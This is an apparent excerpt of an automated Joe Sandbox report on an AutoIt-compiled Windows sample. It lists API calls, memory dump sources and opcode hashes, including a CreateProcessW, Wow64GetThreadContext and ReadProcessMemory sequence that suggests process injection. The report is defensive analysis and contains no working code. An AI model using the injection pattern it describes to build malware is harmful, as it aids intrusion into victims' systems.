                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                      • API String ID: 2861923089-1757145024
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00FA35A1,SwapMouseButtons,00000004,?), ref: 00FA35D4
                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA35F5
                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00FA35A1,SwapMouseButtons,00000004,?,?,?,?,00FA2754), ref: 00FA3617
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID: Control Panel\Mouse
                                                                      • API String ID: 3677997916-824357125
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 015B0233
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015B02C9
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015B02EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      APIs
                                                                        • Part of subcall function 00FA4EE5: _fseek.LIBCMT ref: 00FA4EFD
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009824
                                                                        • Part of subcall function 01009734: _wcscmp.LIBCMT ref: 01009837
                                                                      • _free.LIBCMT ref: 010096A2
                                                                      • _free.LIBCMT ref: 010096A9
                                                                      • _free.LIBCMT ref: 01009714
                                                                        • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                        • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                      • _free.LIBCMT ref: 0100971C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                      • String ID:
                                                                      • API String ID: 1552873950-0
                                                                      • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction ID: 81018b8c6aff4d2efa09c3ff0c439bfa93803e65ba7d91d22b64dfd6b411023b
                                                                      • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                      • Instruction Fuzzy Hash: 56513FB1D04259AFDF259F64CC81A9EBBB9FF88304F00449EB64DA3251DB755A80CF58
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                      • String ID:
                                                                      • API String ID: 2782032738-0
                                                                      • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction ID: 11fd8b5aa7f8a886f5900c817a044762034048a9e69d102e5f2cec970892d405
                                                                      • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                                      • Instruction Fuzzy Hash: 0241B575E007479BDB188EA9CAA2FAE77A5AF81370B24813DE815C7680D774ED41AB40
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FDEA39
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00FDEA83
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                        • Part of subcall function 00FC0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FC07B0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                                      • String ID: X
                                                                      • API String ID: 3777226403-3081909835
                                                                      • Opcode ID: 268b8a51f011bc96f54aaca981ceefb596197797a2cc965ea70d59d3eae12e97
                                                                      • Instruction ID: f9d574cf4cb93988fe952b648e87f920816c3e3352cb9c463741e04d84b90991
                                                                      • Opcode Fuzzy Hash: 268b8a51f011bc96f54aaca981ceefb596197797a2cc965ea70d59d3eae12e97
                                                                      • Instruction Fuzzy Hash: 3C21C671A002499BCB519F94CC45BEE7BFDAF49314F04805AE848AB241DBB859899FA1
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 010098F8
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0100990F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                      • Instruction ID: 5eeb89e10f9ea7337118097439f4a057dea7a0df6f50fc3a3ed36be0497acabb
                                                                      • Opcode Fuzzy Hash: b5ce44f130fc6266d11c337da5e2eb92904f758bcac9be0d10782eb42ee553bf
                                                                      • Instruction Fuzzy Hash: 90D05E7954030EABDB709EA0EC0EFAA773CE705700F1042A1FE94D5191EAB695988BA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                      • Instruction ID: 304708f059a1a4b31da32ca0164478eb317e6fada54abb4ce8adf86e11ecfe85
                                                                      • Opcode Fuzzy Hash: 5a32c5fd448ffe1800403b1c296be70684a875cc065d95dee49337f16c902a55
                                                                      • Instruction Fuzzy Hash: AEF168706083019FDB14DF28C980A6EBBE5FF89314F54896EF8999B251D778E905CF82
                                                                      APIs
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FC0193
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FC019B
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FC01A6
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FC01B1
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FC01B9
                                                                        • Part of subcall function 00FC0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FC01C1
                                                                        • Part of subcall function 00FB60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FAF930), ref: 00FB6154
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FAF9CD
                                                                      • OleInitialize.OLE32(00000000), ref: 00FAFA4A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00FE45C8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 1986988660-0
                                                                      • Opcode ID: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                      • Instruction ID: ed26bc26b7e6eb4b977ccc7c96886c3d9bc7f166b82bbb09198ffee63789b12a
                                                                      • Opcode Fuzzy Hash: 67e2ee872999ba867f83b80a7e6670df1c63c9a3d429a5655d0e344ce6e82fa1
                                                                      • Instruction Fuzzy Hash: DD81D1B0A01250CFC3A4DF39EC556597BE9FB9938AB5081AAD0D8CB369EB7E4404CF10
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FA4370
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA4415
                                                                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA4432
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_$_memset
                                                                      • String ID:
                                                                      • API String ID: 1505330794-0
                                                                      • Opcode ID: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                      • Instruction ID: 6ce78b3c165a062d9dd6f3399d4366eae951f5391e3aaa8a60b2b2cc01c68b84
                                                                      • Opcode Fuzzy Hash: 8f5adeb10554f78e938672ab52fe85f5c0d4db1455886dc33fc85b2d99b5f8df
                                                                      • Instruction Fuzzy Hash: 053181B09047028FD731DF24D88469BBBF8FB9A358F00092EF5DA86241D7B5B944DB52
                                                                      APIs
                                                                      • __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                        • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA192
                                                                        • Part of subcall function 00FCA16B: __NMSG_WRITE.LIBCMT ref: 00FCA19C
                                                                      • __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                        • Part of subcall function 00FCA1C8: GetModuleFileNameW.KERNEL32(00000000,010633BA,00000104,?,00000001,00000000), ref: 00FCA25A
                                                                        • Part of subcall function 00FCA1C8: ___crtMessageBoxW.LIBCMT ref: 00FCA308
                                                                        • Part of subcall function 00FC309F: ___crtCorExitProcess.LIBCMT ref: 00FC30A5
                                                                        • Part of subcall function 00FC309F: ExitProcess.KERNEL32 ref: 00FC30AE
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      • RtlAllocateHeap.NTDLL(01570000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                      • String ID:
                                                                      • API String ID: 1372826849-0
                                                                      • Opcode ID: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                      • Instruction ID: d40958edd2aec18157dce7269f34f228146a7dead5a38277c1024339c972e226
                                                                      • Opcode Fuzzy Hash: a8cc5b30400110ae8be88ac2822e319dc919e04cb29339a6ed2c1dde5f95613f
                                                                      • Instruction Fuzzy Hash: 6D01D632640B1BDAD6202774AE43F6D77489F82BB1F50002DF4059A181DF79ACC17760
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,01009548,?,?,?,?,?,00000004), ref: 010098BB
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 010098D1
                                                                      • CloseHandle.KERNEL32(00000000,?,01009548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010098D8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                      • Instruction ID: 60e5907c9387a4bb4a90c29552d641cbefa086cb1084a3f2fd138cd001ecc254
                                                                      • Opcode Fuzzy Hash: 4ac938634dffb74bb4045f38a56317755339c6fcee7e44990ca42d902e855a7c
                                                                      • Instruction Fuzzy Hash: E4E08632141215B7E7311E54EC0AFCA7F69AB067A4F308210FB94690D087B616119798
                                                                      APIs
                                                                      • _free.LIBCMT ref: 01008D1B
                                                                        • Part of subcall function 00FC2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00FC9A24), ref: 00FC2D69
                                                                        • Part of subcall function 00FC2D55: GetLastError.KERNEL32(00000000,?,00FC9A24), ref: 00FC2D7B
                                                                      • _free.LIBCMT ref: 01008D2C
                                                                      • _free.LIBCMT ref: 01008D3E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 776569668-0
                                                                      • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction ID: 2cfa348369af864702244ffb73a78d48128ab9bb1ba841def208706520f4fcfa
                                                                      • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                      • Instruction Fuzzy Hash: 3BE0C2E1E0160243EBA1B5BCAE41F8333DC9F68352B044A6FB94ED7182CE68F4429028
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: CALL
                                                                      • API String ID: 0-4196123274
                                                                      • Opcode ID: e04a3e679acdadab78db17339a09d1be81f36e9007c6f198ceba750df0f92f86
                                                                      • Instruction ID: 1f21a54c65406773310ab65b23f38170250882b497d18f388218d41ad6bab436
                                                                      • Opcode Fuzzy Hash: e04a3e679acdadab78db17339a09d1be81f36e9007c6f198ceba750df0f92f86
                                                                      • Instruction Fuzzy Hash: 78227FB1908301DFD724DF14C450B6AB7E1BF86314F14896DE89A8B362DB35ED45EB82
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: EA06
                                                                      • API String ID: 4104443479-3962188686
                                                                      • Opcode ID: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                      • Instruction ID: f53476245f069f45f9735579002b07dedabf9b3537c62e712c71414d7ba3b6c0
                                                                      • Opcode Fuzzy Hash: 47ecbecd0ef2702ad90c8893bcbe50ef8fdb1812d85fff664dd993b87dda5bed
                                                                      • Instruction Fuzzy Hash: 37417FF2E041586BDF219B54CC917BE7BA29BC7310F284475FC86DB282D6A47D44B3A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                                      • Instruction ID: a7ba441c8ec6ded86e2699d219c325bd4a7550b04b810b10d5774df20398e37c
                                                                      • Opcode Fuzzy Hash: 9dd4efb868ffb8a5767105da0b16a8b73f80e319b4c4c742e2df27cd6dceb9ed
                                                                      • Instruction Fuzzy Hash: 803173F2604606AFC704EF68CCD1E69B3A9FF493207158629E519CB291EB34E951DB90
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00FA4834
                                                                        • Part of subcall function 00FC336C: __lock.LIBCMT ref: 00FC3372
                                                                        • Part of subcall function 00FC336C: DecodePointer.KERNEL32(00000001,?,00FA4849,00FF7C74), ref: 00FC337E
                                                                        • Part of subcall function 00FC336C: EncodePointer.KERNEL32(?,?,00FA4849,00FF7C74), ref: 00FC3389
                                                                        • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FA4915
                                                                        • Part of subcall function 00FA48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA492A
                                                                        • Part of subcall function 00FA3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
                                                                        • Part of subcall function 00FA3B3A: IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
                                                                        • Part of subcall function 00FA3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
                                                                        • Part of subcall function 00FA3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
                                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FA4874
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                      • String ID:
                                                                      • API String ID: 1438897964-0
                                                                      • Opcode ID: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                      • Instruction ID: 18cf250d74f3715a3646a8d9de1fa7808aa9739e8472d7a4d8e2e38422035ea5
                                                                      • Opcode Fuzzy Hash: ee6866e893417aad04329eae228b875fc0d1239af0ba1de5f0ec06beff91d5cc
                                                                      • Instruction Fuzzy Hash: FB11A5719083429FC710DF28EC0590ABFE8FF8A790F10451EF08083271DBBA9645DB91
                                                                      APIs
                                                                        • Part of subcall function 00FC571C: __FF_MSGBANNER.LIBCMT ref: 00FC5733
                                                                        • Part of subcall function 00FC571C: __NMSG_WRITE.LIBCMT ref: 00FC573A
                                                                        • Part of subcall function 00FC571C: RtlAllocateHeap.NTDLL(01570000,00000000,00000001,00000000,?,?,?,00FC0DD3,?), ref: 00FC575F
                                                                      • std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                      • __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                        • Part of subcall function 00FC859B: RaiseException.KERNEL32(?,?,?,01059E78,00000000,?,?,?,?,00FC0E06,?,01059E78,?,00000001), ref: 00FC85F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
